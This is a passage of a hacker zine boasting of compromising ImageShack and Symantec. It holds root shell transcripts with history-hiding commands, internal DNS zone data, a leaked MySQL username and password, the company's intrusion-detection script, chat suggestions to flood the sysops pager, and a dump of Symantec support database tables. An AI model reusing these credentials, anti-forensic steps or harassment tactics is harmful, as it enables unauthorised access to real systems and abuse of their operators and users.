-rw------- 1 root root 0 Sep 20 2010 imageshack.us.db.save
-rw------- 1 root root 0 Sep 20 2010 imageshack.us.db.save.1
-rw------- 1 named named 6.1K Aug 2 2009 77.99.38.in-addr.arpa
drwxr-xr-x 24 root root 4.0K Jul 20 2009 ..
-rw-r--r-- 1 root root 23K Jul 4 2009 yfrog.db
-rw-r--r-- 1 root root 21K May 25 2009 yfrog.us.db
drwxr-xr-x 4 named named 4.0K Feb 5 2009 slave
-rw-r--r-- 1 root root 696 Jan 27 2009 imageshack.com.au.db.2012.02.03
-rw-r--r-- 1 named named 1.2K Jan 12 2009 imageshack.net.db.OLD-josh
-rw-r--r-- 1 root root 28K Jan 10 2009 imageshack.net.db.bak
-rw-r--r-- 1 root root 28K Jan 6 2009 test.imageshack.us.db
-rw------- 1 named named 740 Jan 4 2009 78.99.38.in-addr.arpa
-rw-r--r-- 1 root root 89K Dec 12 2008 named-stats.rrd
-rw------- 1 named named 6.4K Dec 10 2008 76.99.38.in-addr.arpa
-rw-r--r-- 1 root root 2.0K Oct 29 2008 root.servers
-rw------- 1 named named 99 Oct 27 2008 .bash_history
drwxr-xr-x 4 named named 4.0K Oct 24 2008 external
drwxr-xr-x 4 named named 4.0K Oct 24 2008 internal
-rw------- 1 named named 22K Jul 16 2008 echo.cx.db.bkp
-rw-r--r-- 1 named named 23K Jul 16 2008 exs.cx.db.bkp
-rw-r--r-- 1 named named 661 Jul 15 2008 yulia.com.db
-rw------- 1 named named 583 Feb 28 2008 calibri.net.db
-rw------- 1 named named 11K Feb 17 2008 99.38.in-addr.arpa
-rw------- 1 named named 17K Jan 3 2008 imageshack.us.db.old
-rw------- 1 named named 7.5K Jan 3 2008 imageshack.ws.db
-rw-r--r-- 1 named named 25K Jan 3 2008 jack.sh.db
-rw-r--r-- 1 named named 1.5K Jan 3 2008 named.ca
-rw-r--r-- 1 named named 850 Jan 3 2008 old
-rw------- 1 named named 467 Jan 3 2008 phiom.com.db
-rw-r--r-- 1 named named 11 Jan 3 2008 serial
-rw-r--r-- 1 named named 6 Jan 3 2008 serial.imageshack.us
-rw-r--r-- 1 named named 25K Jan 3 2008 calibri.sh.db
-rw------- 1 named named 25K Jan 3 2008 db-XXMYY8gQ
-rw-r--r-- 1 named named 207 Jan 3 2008 db.127.0.0
-rw-r--r-- 1 named named 2.5K Jan 3 2008 db.cache
-rw------- 1 named named 15K Jan 3 2008 echo.cx.db.bak2
-rw-r--r-- 1 named named 394 Jan 3 2008 error_log
-rw-r--r-- 1 named named 26K Jan 3 2008 exs.bak2
-rw-r--r-- 1 named named 0 Jan 3 2008 exs.cx
-rw-r--r-- 1 named named 26K Jan 3 2008 exs.cx.db.backup
-rw------- 1 named named 14K Jan 3 2008 exs.cx.db.old
-rw-r--r-- 1 named named 31K Jan 3 2008 imageshack.us.db.bak
-rw------- 1 named named 2.2K Jan 3 2008 111.101.38.in-addr.arpa
-rw------- 1 named named 644 Jan 3 2008 79.99.38.in-addr.arpa
-rw-r--r-- 1 named named 198 Mar 8 2006 localdomain.zone
-rw-r--r-- 1 named named 195 Mar 8 2006 localhost.zone
-rw-r--r-- 1 named named 427 Mar 8 2006 named.broadcast
-rw-r--r-- 1 named named 424 Mar 8 2006 named.ip6.local
-rw-r--r-- 1 named named 426 Mar 8 2006 named.local
-rw-r--r-- 1 named named 427 Mar 8 2006 named.zero
drwxrwx--- 2 named named 4.0K Feb 10 2006 data
drwxrwx--- 2 named named 4.0K Feb 10 2006 slaves
# ls -alth /var/named/reverse
total 108K
drwxr-x--- 9 named root 4.0K Feb 10 2012 ..
drwxr-xr-x 3 511 users 4.0K Aug 31 2011 .
-rw-r--r-- 1 511 users 465 Aug 10 2009 0.0.127.in-addr.arpa
-rw-r--r-- 1 511 users 8.3K Aug 10 2009 0.9.10.in-addr.arpa
-rw-r--r-- 1 511 users 1.1K Aug 10 2009 0.94.208.in-addr.arpa
-rw-r--r-- 1 511 users 1.3K Aug 10 2009 1.1.10.in-addr.arpa
-rw-r--r-- 1 511 users 540 Aug 10 2009 1.168.192.in-addr.arpa
-rw-r--r-- 1 511 users 2.0K Aug 10 2009 1.94.208.in-addr.arpa
-rw-r--r-- 1 511 users 475 Aug 10 2009 162.101.38.in-addr.arpa
-rw-r--r-- 1 511 users 475 Aug 10 2009 163.101.38.in-addr.arpa
-rw-r--r-- 1 511 users 3.6K Aug 10 2009 2.94.208.in-addr.arpa
-rw-r--r-- 1 511 users 475 Aug 10 2009 203.99.38.in-addr.arpa
-rw-r--r-- 1 511 users 476 Aug 10 2009 213.99.38.in-addr.arpa
-rw-r--r-- 1 511 users 2.0K Aug 10 2009 3.94.208.in-addr.arpa
-rw-r--r-- 1 511 users 516 Aug 10 2009 55.16.172.in-addr.arpa
-rw-r--r-- 1 511 users 461 Aug 10 2009 55.81.64.in-addr.arpa
-rw-r--r-- 1 511 users 516 Aug 10 2009 56.16.172.in-addr.arpa
-rw-r--r-- 1 511 users 6.0K Aug 10 2009 76.99.38.in-addr.arpa
-rw-r--r-- 1 511 users 5.8K Aug 10 2009 77.99.38.in-addr.arpa
-rw-r--r-- 1 511 users 1.7K Aug 10 2009 78.99.38.in-addr.arpa
-rw-r--r-- 1 511 users 637 Aug 10 2009 99.99.10.in-addr.arpa
drwxr-xr-x 2 511 users 4.0K Aug 10 2009 r
# cat /var/named/.bash_history
set -o vi
/usr/sbin/rndc --help
/usr/sbin/rndc stats
ll /var/named/
/usr/local/bin/dnsgraph.pl
# cat /var/named/named.stats
+++ Statistics Dump +++ (1346607324)
success 10105665245
referral 223405188
nxrrset 1704840965
nxdomain 154331336
recursion 0
failure 14
--- Statistics Dump --- (1346607324)
# cat /var/named/imageshack.us.db|head -n 50
;
; ATTN!!! this file is auto generated on img997.imageshack.us
; DO NOT MAKE CHANGES TO THIS FILE
; To reverse serial # in shell, simply run:
; $ date -u --date="1970-01-01 SERIALNUMBER sec UTC"
;
$TTL 30m ; zone default
@ SOA ns.imageshack.us. root.imageshack.us. (
1303434347 ; serial, todays date++
120 ; refresh, seconds
7200 ; retry, seconds
3600000 ; expire, seconds
86400 ) ; minimum, seconds
2h NS ns.imageshack.us.
2h NS ns6.imageshack.us.
2h NS ns7.imageshack.us.
2h MX 10 ASPMX.L.GOOGLE.COM.
2h MX 20 ALT1.ASPMX.L.GOOGLE.COM.
2h MX 20 ALT2.ASPMX.L.GOOGLE.COM.
2h MX 30 ASPMX2.GOOGLEMAIL.COM.
2h MX 30 ASPMX3.GOOGLEMAIL.COM.
2h MX 30 ASPMX4.GOOGLEMAIL.COM.
2h MX 30 ASPMX5.GOOGLEMAIL.COM.
RP hostmaster.imageshack.us. contact
TXT "google-site-verification=_UGU9JQAf1954qC5QPZ_XUQcUaasByN8fCQil9h3
7kA"
; DKIM security for email authority
I_am_the_decider._domainkey IN TXT "k=rsa\; p=MFwwDQYJKoZIhvcNAQEBBQADSwAwSA
JBAOWwDuu8UkN/nMgObyr+tiQemc5HqiDhZYOI/HxafAb8whUxSI5c/v6ejZPsuUkjxmMMXu6imk
AaoFJ1pOzvOw0CAwEAAQ=="
_domainkey IN TXT "t=y; o=~;"
; END DKIM
imageshack.us. IN TXT "v=spf1 ip4:208.94.0.0/22 ip4:38.99.76.0/22 mx a:img72
4.imageshack.us mx:ASPMX.L.GOOGLE.COM mx:ASPMX5.GOOGLEMAIL.COM include:yfrog
.com ~all"
localhost A 127.0.0.1
;THERMOS VIPS
mtthermos0 A 208.94.0.21
gsthermos0 A 208.94.0.38
eqthermos0 CNAME gsthermos0 ; cname necessary for legacy
rdthermos0 A 208.94.0.61
;THERMOS RR
# cat /var/named/imageshack.us.db|tail -n 50
imageshack.us. 60 A 208.94.0.107
imageshack.us. 60 A 208.94.3.142
imageshack.us. 60 A 208.94.3.151
imageshack.us. 60 A 208.94.3.102
imageshack.us. 60 A 208.94.0.177
load 60 A 208.94.3.13
load 60 A 208.94.3.24
load 60 A 208.94.0.96
load 60 A 208.94.0.98
load 60 A 208.94.3.71
load 60 A 208.94.1.97
load 60 A 208.94.3.150
load 60 A 208.94.2.96
load 60 A 208.94.1.205
load 60 A 208.94.0.176
load 60 A 208.94.0.108
load 60 A 208.94.0.180
load 60 A 208.94.1.34
load 60 A 208.94.1.24
load 60 A 208.94.3.136
ufo 60 A 208.94.1.21
ufo 60 A 208.94.0.178
ufo 60 A 208.94.1.202
ufo 60 A 208.94.3.75
ufo 60 A 208.94.0.179
ufo 60 A 208.94.3.148
ufo 60 A 208.94.0.105
ufo 60 A 208.94.1.217
ufo 60 A 208.94.3.134
ufo 60 A 208.94.1.210
ufo 60 A 208.94.1.96
ufo 60 A 208.94.1.71
ufo 60 A 208.94.3.78
ufo 60 A 208.94.1.6
ufo 60 A 208.94.1.204
www 60 A 208.94.0.95
www 60 A 208.94.3.141
www 60 A 208.94.0.106
www 60 A 208.94.0.94
www 60 A 208.94.2.107
www 60 A 208.94.1.231
www 60 A 208.94.1.203
www 60 A 208.94.0.174
www 60 A 208.94.3.135
www 60 A 208.94.2.85
www 60 A 208.94.1.195
www 60 A 208.94.1.120
www 60 A 208.94.1.7
www 60 A 208.94.1.25
www 60 A 208.94.0.181
# cat /var/named/imageshack.us.db|grep desmond
desmond CNAME thermos
triton CNAME desmond
cache-proxy CNAME desmond
imgcash CNAME desmond
imgcash1 CNAME desmond
imgcash2 CNAME desmond
imgcash3 CNAME desmond
imgcash4 CNAME desmond
imgcash5 CNAME desmond
imgcash6 CNAME desmond
# cat /var/named/imageshack.us.db|grep thermos
mtthermos0 A 208.94.0.21
gsthermos0 A 208.94.0.38
eqthermos0 CNAME gsthermos0 ; cname necessary for legacy
rdthermos0 A 208.94.0.61
thermos 300 A 208.94.0.21
a CNAME thermos
c CNAME thermos
l CNAME thermos
desmond CNAME thermos
profile CNAME thermos
rss CNAME thermos
dbs CNAME thermos
my CNAME thermos
nikonizer CNAME thermos
post CNAME thermos
img617 CNAME thermos
img618 CNAME thermos
img619 CNAME thermos
img620 CNAME thermos
img640 CNAME thermos
# exit
logout
Connection to img997.imageshack.us closed.
Recently, one specific brownhat (see Pwned Lineup/LeReS) alerted Jack, so of
course Jack opened up his logs, and reimaged his boxes, and saved the fucking
planet.
Unfortunately, our zines have a strict no-bullshit policy. Thanks for keeping
UDP open for us, Jack.
<jacklevin> you can prove that?
> root@img662.imageshack.com:~# export owned_again=gslb.imageshack.us
root@img662.imageshack.com:~# export by=HTP
root@img662.imageshack.com:~# export PS1='# '
# unset HISTFILE SAVEHIST PROMPT_COMMAND HISTSAVE TMOUT
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux img662.imageshack.us 2.6.32-220.23.1.el6.x86_64 #1 SMP Mon Jun 18
18:58:52 BST 2012 x86_64 x86_64 x86_64 GNU/Linux
# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 31G 10G 21G 33% /
tmpfs 3.9G 36K 3.9G 1% /dev/shm
/dev/sda2 887G 614M 886G 1% /data
tmpfs 4.0G 11M 4.0G 1% /tmp
# w
21:13:59 up 1 day, 4:18, 0 users, load average: 0.08, 0.24, 0.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
Hahaha busy changing passwords now, huh?
$bd = mysql_connect("127.0.0.1", "snmpuser", "sinused&dtn");
mysql_select_db("snmp", $bd);
?>
Don't worry about it, we'll always protect your boxes..
# mysql -usnmpuser -p'sinused&dtn' -e 'show databases;'
Database
information_schema
snmp
OH SHIT, HE SET UP A HACK DETECTOR. GAME OVER MAN. GAME OVER.
# cat /home/image/svn/setup/misc/detect.php
<?php
require_once('www/config.inc');
require_once('www/lib/sendmail/class.phpmailer.php');
function sendmail($name,$email,$emailtext,$sendersubject,$to,$toname){
$mail = new PHPMailer();
$mail->Host = SMTP_SERVER_NAME;
$mail->From = $email;
$mail->FromName = $name;
$mail->isHtml(false);
$mail->Body = $emailtext;
$mail->AddAddress($to, $toname);
$mail->Subject = $sendersubject;
$status = $mail->Send();
}
$timestamp = filemtime("/var/log/hack");
$nowtime = time();
$human_timestamp = date("M jS Y, g:i:s a",$timestamp);
$human_nowtime = date("M jS Y, g:i:s a",$nowtime);
$emailtext = "/var/log/hack last modified on $human_timestamp";
if($nowtime-$timestamp < 70){ //the timestamp was modified within at least
70 seconds of this script's running
echo "hack detected\n";
sendmail("Hack Detector","noreply@imageshack.us",$emailtext,"/var/log/hack "
.$human_timestamp,"sysops-pager@imageshack.us","Sysops Team");
} else {
echo "no hack detected\n";
}
?>
<chippy> spam the fuck out of that email when jack goes to bed
<chippy> he will have
<chippy> a fun night
<chippy> with his pager going crazy
<jack> are you sure your friends are absolutely reliable? and no amount of money
will not buy them?
Yeah, we're done here.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
0x02
▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
█ ▄ ▄ ▄ ▄ ▄▄▄ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ █ Symantec - ThreatCon : █▒
▀▀▀█ █▄▄█ █▀▄▀█ █▄█ █▀▄█ █ █▄▄ █ █ Offline (maintainance) █▒
▄▄▄█ ▄▄▄█ █ █ █ █ █ █ █ █▄▄▄ █▄▄▄ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█▒
THREATLEVEL ALPHA BETA EXTREME
I WANT A COOKIE. GIVE ME A COOKIE NOW!
<HAL> There's a new virus in the database.
<MARGO> What's happening?
<HAL> It's replicating, eating up memory. What do I do?
<PLAGUE> Type "Cookie", you idiot. I'll head 'em off at the pass.
> Saved by your WAF? You wish. All the other major AV corps are owned too,
yours just pissed us off the most. Oh, and if you think we're listing
everything here, take the blue pill.
> Oh, and nice JBoss on Verisign, by the way. We've always been entertained by
Symantec partnerships. (especially Huawei..)
SUPPORT SCHEMA:
Database: dbsprtcms
Table: dbo.sprt_nc_paramslog
[6 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| nc_pl_detailed_fault | image |
| nc_pl_fault_code | nvarchar |
| nc_pl_fault_string | nvarchar |
| nc_pl_request_guid | char |
| nc_pl_rpc_type | int |
| nc_pl_status | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_test_results
[9 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| svtr_display_key | nvarchar |
| svtr_raw_key | nvarchar |
| svtr_service_device_guid | char |
| svtr_threshold_key | nvarchar |
| svtr_type | varchar |
| svtr_valdate | datetime |
| svtr_valfloat | float |
| svtr_valint | int |
| svtr_valstring | nvarchar |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_Clt_Cust
[9 columns]
+----------------------------+----------+
| Column | Type |
+----------------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pAssetRefSI | nvarchar |
| pCustomerLowOrg | nvarchar |
| pCustomerName | nvarchar |
| pLocation | nvarchar |
| pPhone | nvarchar |
| pSDCAsset_Clt_Cust_Binding | nvarchar |
| pTechnician | nvarchar |
+----------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_thresholds
[8 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| borderline | char |
| displayname | nvarchar |
| relation | nvarchar |
| siproperty | nvarchar |
| sith_geography_guid | char |
| sith_owner | varchar |
| thresholdrow_guid | char |
| thresholdvalues | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_cache_id
[3 columns]
+---------------------+------+
| Column | Type |
+---------------------+------+
| crcaid_cache_guid | char |
| crcaid_content_guid | char |
| crcaid_folder_guid | char |
+---------------------+------+
Database: dbsprtcms
Table: dbo.sprt_sc_article_translation_status
[7 columns]
+-----------------------------+----------+
| Column | Type |
+-----------------------------+----------+
| scat_content_guid | char |
| scat_content_version | char |
| scat_language_map | nchar |
| scat_parent_content_guid | char |
| scat_parent_content_version | char |
| scat_status_code | nchar |
| sct_transaction_date | datetime |
+-----------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_events
[4 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| client_guid | nvarchar |
| events | nvarchar |
| user_guid | nvarchar |
| yesno | nchar |
+-------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sasv_testresults_details
[37 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| svrd_avg | float |
| svrd_avg_errors | float |
| svrd_completion_id | int |
| svrd_corr_bytes | int |
| svrd_cust_id | nvarchar |
| svrd_davic_status | nvarchar |
| svrd_days_to_expire | nvarchar |
| svrd_device_id | nvarchar |
| svrd_fdc_snr | int |
| svrd_fdc_status | int |
| svrd_install_attempts | int |
| svrd_install_failed | int |
| svrd_ip | nvarchar |
| svrd_ippv_enabled | nvarchar |
| svrd_is_install_box | nvarchar |
| svrd_last_tuned | nvarchar |
| svrd_loss | int |
| svrd_mode | nvarchar |
| svrd_plant_failed | int |
| svrd_qam_status | nvarchar |
| svrd_qpsk_status | nvarchar |
| svrd_rdc_status | int |
| svrd_reason | nvarchar |
| svrd_reconcile | nvarchar |
| svrd_settop_gain | nvarchar |
| svrd_status | nvarchar |
| svrd_sub_expires | datetime |
| svrd_tech_fname | nvarchar |
| svrd_tech_id | nvarchar |
| svrd_tech_lname | nvarchar |
| svrd_trans_date | datetime |
| svrd_trans_id | int |
| svrd_trouble_call | nvarchar |
| svrd_tuner_status | nvarchar |
| svrd_type | nvarchar |
| svrd_uncorr_blks | int |
| svrd_workorder | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nexus_xref_history
[22 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| snxh_analyst | nvarchar |
| snxh_analyst_type | int |
| snxh_auth_token | nvarchar |
| snxh_client_guid | nvarchar |
| snxh_client_os | nvarchar |
| snxh_connection_type | int |
| snxh_group_guid | char |
| snxh_ip_address | nvarchar |
| snxh_iss_guid | char |
| snxh_last_update_type | int |
| snxh_nexus_user | nvarchar |
| snxh_notes | nvarchar |
| snxh_other | nvarchar |
| snxh_problem | nvarchar |
| snxh_record_fname | nvarchar |
| snxh_record_state | int |
| snxh_session | char |
| snxh_status | int |
| snxh_time_closed | datetime |
| snxh_time_in | datetime |
| snxh_time_picked | datetime |
| snxh_user_type | int |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_trans_admin_request
[4 columns]
+---------------------------+------+
| Column | Type |
+---------------------------+------+
| nc_tar_admin_request_guid | char |
| nc_tar_cpe_guid | char |
| nc_tar_guid | char |
| nc_tar_trans_guid | char |
+---------------------------+------+
Database: dbsprtcms
Table: dbo.sprt_sc_wf_workflowqueue
[11 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| scwfq_approved | int |
| scwfq_assignedgroup_guid | char |
| scwfq_assigneduser_id | varchar |
| scwfq_author_id | varchar |
| scwfq_content_id | char |
| scwfq_content_version | int |
| scwfq_currentstage | int |
| scwfq_date_submitted | datetime |
| scwfq_id | char |
| scwfq_row_guid | char |
| scwfq_scheme_id | char |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_ParallelPort
[5 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pName | nvarchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_transaction_properties
[6 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| svtp_key | nvarchar |
| svtp_transaction_guid | char |
| svtp_valdate | datetime |
| svtp_valfloat | float |
| svtp_valint | int |
| svtp_valnvarchar | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_top_problems
[13 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| active | int |
| cncategory_guid | char |
| cncategory_id | int |
| cnstatus | nvarchar |
| descriptions | nvarchar |
| keyword_or_url | nvarchar |
| keyword_or_url_flag | int |
| link_text | nvarchar |
| name | nvarchar |
| problem_order | int |
| topp_guid | char |
| topp_id | int |
| tpcontent_guid | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ini_data
[9 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| content_guid | nvarchar |
| ini_data_displayname | nvarchar |
| ini_data_guid | char |
| ini_data_id | int |
| ini_data_type | nvarchar |
| keyname | nvarchar |
| section | nvarchar |
| sectiond | nvarchar |
| value | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_srclog
[10 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| sss_action | char |
| sss_comment | nvarchar |
| sss_content_guid | char |
| sss_content_version | int |
| sss_date | datetime |
| sss_rating | int |
| sss_row_guid | char |
| sss_session | char |
| sss_solved | int |
| sss_src_value | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_permissions
[7 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| code | nvarchar |
| descriptions | nvarchar |
| displayname | nvarchar |
| name | nvarchar |
| permission_guid | char |
| permission_id | int |
| type | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_registry
[6 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| keyname | nvarchar |
| keypath | nvarchar |
| keytype | nvarchar |
| keyvalue | nvarchar |
| registry_guid | char |
| user_id | int |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_userinfo_old
[10 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| scui_audience | nchar |
| scui_client_guid | char |
| scui_entry | nvarchar |
| scui_httphost | nvarchar |
| scui_logonuser | nvarchar |
| scui_remoteaddr | nvarchar |
| scui_row_guid | char |
| scui_scriptname | nvarchar |
| scui_session | char |
| scui_timestamp | datetime |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_list
[11 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| spl_bugtraq_url | nvarchar |
| spl_bulletin_id | nvarchar |
| spl_comment | ntext |
| spl_cveid_url | nvarchar |
| spl_level | int |
| spl_patch_guid | char |
| spl_patch_name | nvarchar |
| spl_qnumber | nvarchar |
| spl_severity | int |
| spl_severity_str | nvarchar |
| spl_superced_id | int |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_rotated_sasv
[148 columns]
+--------------------------------+----------+
| Column | Type |
+--------------------------------+----------+
| svtr_admin_status | nvarchar |
| svtr_admin_status_ryg | int |
| svtr_avg_errors_1 | nvarchar |
| svtr_avg_errors_2 | nvarchar |
| svtr_avg_errors_2nd_1 | nvarchar |
| svtr_avg_errors_2nd_2 | nvarchar |
| svtr_avg_errors_2nd_3 | nvarchar |
| svtr_avg_errors_3 | nvarchar |
| svtr_billing_2way | int |
| svtr_billing_ippv | int |
| svtr_channel_1 | nvarchar |
| svtr_channel_1_ryg | int |
| svtr_channel_2 | nvarchar |
| svtr_channel_2_ryg | int |
| svtr_channel_3 | nvarchar |
| svtr_channel_3_ryg | int |
| svtr_corr_bytes_1 | nvarchar |
| svtr_corr_bytes_2 | nvarchar |
| svtr_corr_bytes_2nd_1 | nvarchar |
| svtr_corr_bytes_2nd_2 | nvarchar |
| svtr_corr_bytes_2nd_3 | nvarchar |
| svtr_corr_bytes_3 | nvarchar |
| svtr_davic_status | nvarchar |
| svtr_davic_status_ryg | int |
| svtr_days_to_expire | nvarchar |
| svtr_days_to_expire_ryg | int |
| svtr_device_id | nvarchar |
| svtr_device_ip | nvarchar |
| svtr_device_ip_ryg | int |
| svtr_device_serial | nvarchar |
| svtr_device_type | nvarchar |
| svtr_fdc_avg_errors | nvarchar |
| svtr_fdc_avg_errors_2nd | nvarchar |
| svtr_fdc_corr_bytes | nvarchar |
| svtr_fdc_corr_bytes_2nd | nvarchar |
| svtr_fdc_level | nvarchar |
| svtr_fdc_seconds_tuned | nvarchar |
| svtr_fdc_seconds_tuned_2nd | nvarchar |
| svtr_fdc_snr | nvarchar |
| svtr_fdc_status | nvarchar |
| svtr_fdc_total_bytes | nvarchar |
| svtr_fdc_total_bytes_2nd | nvarchar |
| svtr_fdc_uncorr_blks | nvarchar |
| svtr_fdc_uncorr_blks_2nd | nvarchar |
| svtr_freq_type_1 | nvarchar |
| svtr_freq_type_2 | nvarchar |
| svtr_freq_type_3 | nvarchar |
| svtr_frequency_1 | nvarchar |
| svtr_frequency_1_ryg | int |
| svtr_frequency_2 | nvarchar |
| svtr_frequency_2_ryg | int |
| svtr_frequency_3 | nvarchar |
| svtr_frequency_3_ryg | int |
| svtr_hub_id | nvarchar |
| svtr_hub_name | nvarchar |
| svtr_install_failed | nvarchar |
| svtr_ippv_enabled | nvarchar |
| svtr_ippv_enabled_ryg | int |
| svtr_last_freq | nvarchar |
| svtr_last_tuned | nvarchar |
| svtr_mod_type_1 | nvarchar |
| svtr_mod_type_1_ryg | int |
| svtr_mod_type_2 | nvarchar |
| svtr_mod_type_2_ryg | int |
| svtr_mod_type_3 | nvarchar |
| svtr_mod_type_3_ryg | int |
| svtr_oper_status | nvarchar |
| svtr_ping_success | nvarchar |
| svtr_ping_success_ryg | int |
| svtr_post_fec | nvarchar |
| svtr_post_fec_ryg | int |
| svtr_post_fec_status | nvarchar |
| svtr_power_status | nvarchar |
| svtr_power_status_ryg | int |
| svtr_pre_fec | nvarchar |
| svtr_pre_fec_ryg | int |
| svtr_pre_fec_status | nvarchar |
| svtr_qam_corr_overtime_1 | nvarchar |
| svtr_qam_corr_overtime_1_ryg | int |
| svtr_qam_corr_overtime_2 | nvarchar |
| svtr_qam_corr_overtime_2_ryg | int |
| svtr_qam_corr_overtime_3 | nvarchar |
| svtr_qam_corr_overtime_3_ryg | int |
| svtr_qam_corr_status_1 | nvarchar |
| svtr_qam_corr_status_2 | nvarchar |
| svtr_qam_corr_status_3 | nvarchar |
| svtr_qam_id_1 | nvarchar |
| svtr_qam_id_2 | nvarchar |
| svtr_qam_id_3 | nvarchar |
| svtr_qam_level_1 | nvarchar |
| svtr_qam_level_2 | nvarchar |
| svtr_qam_level_3 | nvarchar |
| svtr_qam_name_1 | nvarchar |
| svtr_qam_name_2 | nvarchar |
| svtr_qam_name_3 | nvarchar |
| svtr_qam_snr_1 | nvarchar |
| svtr_qam_snr_1_ryg | int |
| svtr_qam_snr_2 | nvarchar |
| svtr_qam_snr_2_ryg | int |
| svtr_qam_snr_3 | nvarchar |
| svtr_qam_snr_3_ryg | int |
| svtr_qam_snr_status_1 | nvarchar |
| svtr_qam_snr_status_2 | nvarchar |
| svtr_qam_snr_status_3 | nvarchar |
| svtr_qam_status | nvarchar |
| svtr_qam_uncorr_overtime_1 | nvarchar |
| svtr_qam_uncorr_overtime_1_ryg | int |
| svtr_qam_uncorr_overtime_2 | nvarchar |
| svtr_qam_uncorr_overtime_2_ryg | int |
| svtr_qam_uncorr_overtime_3 | nvarchar |
| svtr_qam_uncorr_overtime_3_ryg | int |
| svtr_qam_uncorr_status_1 | nvarchar |
| svtr_qam_uncorr_status_2 | nvarchar |
| svtr_qam_uncorr_status_3 | nvarchar |
| svtr_qpsk_id | nvarchar |
| svtr_qpsk_name | nvarchar |
| svtr_qpsk_name_ryg | int |
| svtr_qpsk_status | nvarchar |
| svtr_qpsk_status_ryg | int |
| svtr_rdc_level | nvarchar |
| svtr_rdc_level_ryg | int |
| svtr_rdc_status | nvarchar |
| svtr_reason | nvarchar |
| svtr_sbie_error_code | nvarchar |
| svtr_sbie_error_reason | nvarchar |
| svtr_seconds_tuned_1 | nvarchar |
| svtr_seconds_tuned_2 | nvarchar |
| svtr_seconds_tuned_2nd_1 | nvarchar |
| svtr_seconds_tuned_2nd_2 | nvarchar |
| svtr_seconds_tuned_2nd_3 | nvarchar |
| svtr_seconds_tuned_3 | nvarchar |
| svtr_service_device_guid | char |
| svtr_settop_gain | nvarchar |
| svtr_sub_expires | nvarchar |
| svtr_tuner_status | nvarchar |
| svtr_tuner_status_1 | nvarchar |
| svtr_tuner_status_1_ryg | int |
| svtr_tuner_status_2 | nvarchar |
| svtr_tuner_status_2_ryg | int |
| svtr_tuner_status_3 | nvarchar |
| svtr_tuner_status_3_ryg | int |
| svtr_tuner_status_ryg | int |
| svtr_uncorr_blks_1 | nvarchar |
| svtr_uncorr_blks_2 | nvarchar |
| svtr_uncorr_blks_2nd_1 | nvarchar |
| svtr_uncorr_blks_2nd_2 | nvarchar |
| svtr_uncorr_blks_2nd_3 | nvarchar |
| svtr_uncorr_blks_3 | nvarchar |
+--------------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_summary_rpt
[14 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| chsum_avg_handle_time | float |
| chsum_avg_wait_time | float |
| chsum_interval_start_time | datetime |
| chsum_interval_type | char |
| chsum_no_abandoned | int |
| chsum_no_escalated_in | int |
| chsum_no_escalated_out | int |
| chsum_no_resolved | int |
| chsum_queue | nvarchar |
| chsum_sessions_completed | int |
| chsum_sessions_initiated | int |
| chsum_time_available | float |
| chsum_time_logged_in | float |
| chsum_total_queued | int |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_usage_history
[16 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| scuh_admin_weight | int |
| scuh_comment | nvarchar |
| scuh_content_guid | char |
| scuh_content_version | int |
| scuh_data | nvarchar |
| scuh_inserted_timestamp | datetime |
| scuh_position | int |
